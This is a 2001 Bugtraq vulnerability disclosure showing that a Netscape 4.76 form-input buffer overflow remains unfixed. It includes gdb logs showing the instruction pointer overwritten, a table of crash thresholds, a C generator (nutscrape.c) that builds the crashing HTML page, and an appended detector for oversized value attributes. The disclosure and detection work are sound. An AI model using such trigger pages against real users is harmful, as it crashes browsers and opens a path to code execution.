[18637] in bugtraq
Buffer Overflow still exists in Netscape <= 4.76
daemon@ATHENA.MIT.EDU (fish stiqz)
Tue Jan 16 13:13:44 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-ID: <20010116001943.A24465@analog.org>
Date: Tue, 16 Jan 2001 00:19:43 -0500
Reply-To: fish stiqz <fish@ANALOG.ORG>
From: fish stiqz <fish@ANALOG.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Hello.
I have noticed that the buffer overflow discovered by Michal Zalewski
and covered extensively by the different unix distributions is still
present in netscape 4.76 even though they claim it is not.
Refer to these links for background information:
http://security-archive.merton.ox.ac.uk/bugtraq-200011/0099.html
http://security-archive.merton.ox.ac.uk/bugtraq-200011/0426.html
http://www.redhat.com/support/errata/RHSA-2000-109.html
All of the above advisories (and all that I've seen) state that netscape
versions up to and including 4.75 are vulnerable, not 4.76. I have
caused netscape 4.76 on both redhat 6.2 and slackware-current to segfault.
Below is the proof of the pudding:
On slackware-current (netscape.tgz):
$ ./nutscrape 20000 > crash_me.html
$ netscape -v
Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
$ gdb /usr/bin/netscape
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
(gdb) set args http://fish.analog.org/~fish/crash_me.html
(gdb) run
Starting program: /usr/bin/netscape
http://fish.analog.org/~fish/crash_me.html
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax 0x41414141 1094795585
ecx 0xbfffd904 -1073751804
edx 0x91c1c00 152837120
ebx 0x175a2c 1530412
esp 0xbfffd83c 0xbfffd83c
ebp 0xbfffd864 0xbfffd864
esi 0x0 0
edi 0x921eb8c 153217932
eip 0x41414141 0x41414141
eflags 0x10246 66118
<snip>
On Redhat 6.2 (netscape-communicator-4.76-0.6.2.i386.rpm):
$ cat /etc/redhat-release
Red Hat Linux release 6.2 (Zoot)
$ netscape -v
Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp.
$ rpm -qa |grep netscape
netscape-communicator-4.76-0.6.2
netscape-common-4.76-0.6.2
$ gdb /usr/lib/netscape/netscape-communicator
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) run http://fish.analog.org/~fish/crash_me.html
Starting program: /usr/lib/netscape/netscape-communicator
http://fish.analog.org/~fish/crash_me.html
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()Cannot access memory at address 0x7f0000
(gdb) info all-registers
eax 0x41414141 1094795585
ecx 0xbfffdd14 -1073750764
edx 0x9268200 153518592
ebx 0x40064a2c 1074154028
esp 0xbfffdc4c -1073750964
ebp 0xbfffdc74 -1073750924
esi 0x0 0
edi 0x92624ec 153494764
eip 0x41414141 1094795585
eflags 0x10246 66118
<snip>
So we see here that our eip is now 0x41414141. This is obviously bad.
Windows versions seem to not be vulnerable, although I have only tested
this on versions 4.08 and 4.61.
If this vulnerability is exploited, an attacker could gain entrance to
potentially any computer running vulnerable versions of netscape that
visits his website. To test if you are vulnerable, point your browser to
http://fish.analog.org/~fish/crash_netscape.html (15,000 A's) or
http://fish.analog.org/~fish/crash_netscape2.html (100,000 A's)
My findings (you may have to hit reload before the browser will crash):
Number of A's | Result
--------------+--------------------------------------------------------------
      1000    | Nothing.
      2000    | Nothing.
      5000    | Memory corruption (check view source and you may see this)
      7000    | Continued corruption.
     10000    | SIGSEGV in PR_HashTableRawLookup ()
     15000    | SIGSEGV in _MD_GetArchitecture ()
  >= 20000    | SIGSEGV in XFE_GetFormElementInfo (),
              | and sometimes eip overwrite.
--------------+--------------------------------------------------------------
nutscrape.c is a very trivial program that generates a big html form
value in an input field, which causes the overflow.
/*
 * nutscrape.c - fish stiqz <fish@analog.org>
 * Trivial overflow in netscape.
 *
 * Writes an HTML page to stdout whose password <input> carries a value
 * of <num> repeated OVERFLOW_BYTE ('A') characters.
 */
#include <stdio.h>
#include <stdlib.h>

#define OVERFLOW_BYTE 0x41      /* 'A' */

void usage(char *p)
{
    fprintf(stderr, "usage: %s <num of %c's>\n", p, OVERFLOW_BYTE);
    exit(EXIT_FAILURE);
}

int main(int argc, char **argv)
{
    int i, t;

    if(argc != 2)
        usage(argv[0]);
    t = atoi(argv[1]);          /* number of bytes to put in the value attribute */

    printf("<html>\n\n<head>\n<title>Test of Netscape</title>\n"
           "</head>\n\n<body>\n\n\n<form action=foo method=bar>\n"
           "<input type=password value=");
    for(i = 0; i < t; i++)
        putc(OVERFLOW_BYTE, stdout);
    printf(">\nmore form tags\n</form>\n\n\n</body>\n</html>\n");

    return EXIT_SUCCESS;
}
So, in summary, if you upgraded to netscape 4.76 to fix the buffer
overflow problem, then you upgraded in vain; the problem most
definitely still exists.
Hope you all have a good day.
- fish stiqz
shoutouts to nerile.
#TelcoNinjas suck.
--
+---------------------------------------------------------------------------+
| fish stiqz <fish@analog.org> <*)))-< ** yum, yum, delicious ** |
+---------------------------------------------------------------------------+
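Added example (not part of the post above, and not code from its author): a content check that flags pages carrying the trigger pattern the findings table describes, an <input> value attribute thousands of bytes long. The 4096-byte limit and the make_form_page helper are my assumptions; the helper builds a constructed page in the same shape nutscrape emits so the check can be run offline.

```c
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Length in bytes of the longest value= attribute in html. Handles both
 * quoted and unquoted attribute syntax; the crash page uses the unquoted
 * form, where the value runs until whitespace or '>'. */
size_t longest_value_attr(const char *html)
{
    size_t longest = 0;
    const char *p = html;

    while ((p = strstr(p, "value=")) != NULL) {
        size_t len = 0;
        p += strlen("value=");
        if (*p == '"' || *p == '\'') {
            char quote = *p++;
            while (p[len] != '\0' && p[len] != quote)
                len++;
        } else {
            while (p[len] != '\0' && p[len] != '>' &&
                   !isspace((unsigned char)p[len]))
                len++;
        }
        if (len > longest)
            longest = len;
        p += len;
    }
    return longest;
}

/* Nonzero if any value= attribute is longer than limit bytes (assumed
 * limit: pick one well below the 5000-byte corruption threshold above). */
int page_exceeds_limit(const char *html, size_t limit)
{
    return longest_value_attr(html) > limit;
}

/* Constructed sample (hypothetical helper): a page in the shape nutscrape
 * produces, with n copies of 'A' in the value attribute. Caller frees. */
char *make_form_page(size_t n)
{
    const char *head = "<html><body><form action=foo method=bar>\n"
                       "<input type=password value=";
    const char *tail = ">\n</form></body></html>\n";
    char *page = malloc(strlen(head) + n + strlen(tail) + 1);
    if (page != NULL) {
        strcpy(page, head);
        memset(page + strlen(head), 'A', n);
        strcpy(page + strlen(head) + n, tail);
    }
    return page;
}
```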